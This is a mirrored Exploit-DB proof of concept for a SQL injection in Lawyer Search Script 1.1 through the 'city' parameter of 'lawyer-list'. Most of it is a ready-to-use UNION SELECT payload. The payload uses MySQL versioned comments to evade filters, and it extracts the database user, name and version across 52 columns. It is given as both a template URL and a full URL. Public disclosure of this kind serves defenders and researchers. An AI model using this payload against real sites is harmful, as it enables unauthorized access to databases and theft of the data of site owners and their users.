Lawyer Search Script 1.1 – ‘lawyer-list?city’ SQL Injection

  • 作者: Ihsan Sencan
    日期: 2017-12-11
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/43289/
  • # # # # # 
    # Exploit Title: Lawyer Search Script 1.1 - SQL Injection
    # Dork: N/A
    # Date: 08.12.2017
    # Vendor Homepage: https://www.phpscriptsmall.com/
    # Software Link: https://www.phpscriptsmall.com/product/lawyer-script/
    # Version: 1.1
    # Category: Webapps
    # Tested on: WiN7_x64/KaLiLinuX_x64
    # CVE: N/A
    # # # # #
    # Exploit Author: Ihsan Sencan
    # Author Web: http://ihsan.net
    # Author Social: @ihsansencan
    # # # # #
    # Description:
    # The vulnerability allows an attacker to inject sql commands....
    # 
    # Proof of Concept: 
    # 
    # 1)
    # http://localhost/[PATH]/lawyer-list?city=[SQL]&main_search=
    # 
    # -1'+/*!11111UNION*/+/*!11111SELECT*/+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52--+-
    # 
    # http://server/lawyer-list?city=-1'+/*!11111UNION*/+/*!11111SELECT*/+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52--+-&main_search=
    # 
    # # # # #